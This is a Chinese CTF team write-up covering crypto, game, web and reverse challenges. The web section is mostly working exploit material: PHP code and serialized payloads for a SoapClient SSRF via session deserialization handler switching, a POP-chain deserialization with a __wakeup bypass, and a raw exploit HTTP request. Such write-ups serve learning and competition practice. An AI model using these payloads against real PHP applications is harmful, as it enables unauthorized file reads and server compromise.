AXB HashRun安全团队wp

admin 2023年1月17日14:51:13CTF专场评论10 views4967字阅读16分33秒阅读模式

Cry1 @S1gMa

知识点:sha256掩码爆破

step1 :先nc链接获取密文,然后根据 “xxxx + 明文” 进行掩码爆破将爆破出的字符串和密文的前8比对得到结果。

脚本如下:

import hashlibdic=['Q','W','E','R','T','Y','U','I','O','A','S','D','F','G','H','J','K','P','L','Z','X','C','V','B','N','M','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0']for a in range(len(dic)):    for b in range(len(dic)):        for c in range(len(dic)):            for d in range(len(dic)):                m = dic[a] + dic[b] + dic[c] + dic[d] + ''                flag=hashlib.sha256(m.encode('utf-8')).hexdigest()                if flag[0:8]=='':                    print (flag)                    print(dic[a],dic[b],dic[c],dic[d])

step2:头铁猜数字,直接猜就行只有6次机会,失败了得重新nc然后重复step1的操作。

D0g3{Y0u_C4n_gu3ss_The_Fl4g}

[email protected]

打开游戏,ce速度改500

在疯狂鬼畜的上升中隐约看到一个非常臭的数字

flag:D0g3{1145141919810}

AXB HashRun安全团队wp

[email protected]

参考链接:https://www.cnblogs.com/NPFS/p/14335370.html

网站源码

index.php

<?phpclass A{    public $a;    public $b;
public function __wakeup(){ $this->a = "babyhacker"; }
public function __invoke(){ if (isset($this->a) && $this->a == md5($this->a)) { $this->b->uwant(); } }}
class B{ public $a; public $b; public $k;
function __destruct(){ $this->b = $this->k; die($this->a); }}
class C{ public $a; public $c;
public function __toString(){ $cc = $this->c; return $cc(); } public function uwant(){ if ($this->a == "phpinfo") { phpinfo(); } else { call_user_func(array(reset($_SESSION), $this->a)); } }}

if (isset($_GET['d0g3'])) { ini_set($_GET['baby'], $_GET['d0g3']); session_start(); $_SESSION['sess'] = $_POST['sess'];}else{ session_start(); if (isset($_POST["pop"])) { unserialize($_POST["pop"]); }}var_dump($_SESSION);highlight_file(__FILE__);

flag.php

<?phpsession_start();highlight_file(__FILE__);//flag在根目录下if($_SERVER["REMOTE_ADDR"]==="127.0.0.1"){    $f1ag=implode(array(new $_GET['a']($_GET['b'])));    $_SESSION["F1AG"]= $f1ag;}else{   echo "only localhost!!";}

发现flag.php文件new了一下,需要一个类,第一个思路,php原生类,在看提示,flag在根目录

我们也是通过这个入口点进行读取,找到一个php原生类,进行读取DirectoryIterator

AXB HashRun安全团队wp

然后flag文件为:f1111llllllaagg

可以利用 SoapClient 类的 __call (当调用对象中不存在的方法会自动调用此方法)方法来进行 SSRF

call_user_func函数中的参数可以是一个数组,数组中第一个元素为类名,第二个元素为类方法。

先传入extract(),将$b覆盖成回调函数,这样题目中的 call_user_func($b,$a) 就可以变成 call_user_func(‘call_user_func’,array(‘SoapClient’,’welcome_to_the_lctf2018’)) ,即调用 SoapClient 类不存在的 welcome_to_the_lctf2018 方法,从而触发 __call 方法发起 soap 请求进行 SSRF

然后session反序列化

随,构造exp:

<?php$url = "http://127.0.0.1/flag.php?a=SplFileObject&b=/f1111llllllaagg";$b = new SoapClient(null, array('uri' => $url, 'location' => $url));$a = serialize($b);$a = str_replace('^^', "rn", $a);echo "|" . urlencode($a);?>

pop:

O%3A10%3A%22SoapClient%22%3A3%3A%7Bs%3A3%3A%22uri%22%3Bs%3A60%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%3Fa%3DSplFileObject%26b%3D%2Ff1111llllllaagg%22%3Bs%3A8%3A%22location%22%3Bs%3A60%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%3Fa%3DSplFileObject%26b%3D%2Ff1111llllllaagg%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D

然后传入,数据包:

POST /?d0g3=php_serialize&baby=session.serialize_handler HTTP/1.1Host: 你猜Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=8lorqmn6i2nl32ab290gnooakcConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 320
sess=|O%3A10%3A%22SoapClient%22%3A3%3A%7Bs%3A3%3A%22uri%22%3Bs%3A60%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%3Fa%3DSplFileObject%26b%3D%2Ff1111llllllaagg%22%3Bs%3A8%3A%22location%22%3Bs%3A60%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%3Fa%3DSplFileObject%26b%3D%2Ff1111llllllaagg%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D

然后访问index.php一次,在看index.php反序列化构造:

wakeup好绕过加个属性数量就ok,接下来的思路:

C类中的$cc会触发A类的__invoke()魔术方法,A类的a属性会触发C类的__toString方法然后A类方法中会调用uwant方法,uwant方法在C类所以A类方法中的b属性为C的对象,md5哪些就不说了

即exp(未最终):

<?php
class A{ public $a; public $b;}
class B{ public $a; public $b; public $k;}
class C{ public $a; public $c;}
$d = new A();$e = new B();$f = new C();$g = new C();
$e -> a = $f;//$d -> a = $f;$f -> c = $d;$d -> b = $g;$d -> a = "0e215962017";$g -> a = "phpinfo";echo serialize($e);

最终exp:

<?php
class A{ public $a; public $b;}
class B{ public $a; public $b; public $k;}
class C{ public $a; public $c;}
$d = new A();$e = new B();$f = new C();$g = new C();
$e -> a = $f;//$d -> a = $f;$f -> c = $d;$d -> b = $g;$d -> a = "0e215962017";$g -> a = "www"; //随便写,只要不等于phpinfoecho serialize($e);

这里phpinfo可以验证是否对,跑出来给属性加加个数字即可绕过wakeup,

上exp的pop链+wakeup绕过:

O:1:"B":4:{s:1:"a";O:1:"C":2:{s:1:"a";N;s:1:"c";O:1:"A":2:{s:1:"a";s:11:"0e215962017";s:1:"b";O:1:"C":2:{s:1:"a";s:7:"phpinfo";s:1:"c";N;}}}s:1:"b";N;s:1:"c";N;}

如果不等于phpinfo即可进入到call_user_func

pop:

O:1:"B":4:{s:1:"a";O:1:"C":2:{s:1:"a";N;s:1:"c";O:1:"A":2:{s:1:"a";s:11:"0e215962017";s:1:"b";O:1:"C":2:{s:1:"a";s:3:"www";s:1:"c";N;}}}s:1:"b";N;s:1:"c";N;}

先对其经行session反序列化搞定reset

AXB HashRun安全团队wp

访问index.php即可看到成功

AXB HashRun安全团队wp

然后再打pop

AXB HashRun安全团队wp

500说明执行了,在访问index.php

AXB HashRun安全团队wp

可以看到完整的触发结果,并且服务器给我们一个phpsession,我们把原先的session改了,再次访问index.php即可查看到flag

AXB HashRun安全团队wp

D0g3{d18dfdd0c0064af3ac355b919b77df49}

[email protected]

ida打开,函数很少,看到有个创建子进程,然后暂停修改子进程eip.

点入对应函数,发现判断输入字节数,加密函数有一条简单的花指令.

去掉后发现是未变异的rc4.

AXB HashRun安全团队wp

数据和key抠出来上网在线解密就行了.

d0g3{This_15_FindWind0w}

HashRun安全团队最终排名56

原文始发于微信公众号(HashRun安全团队):AXB HashRun安全团队wp

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月17日14:51:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  AXB HashRun安全团队wp http://cn-sec.com/archives/1429025.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: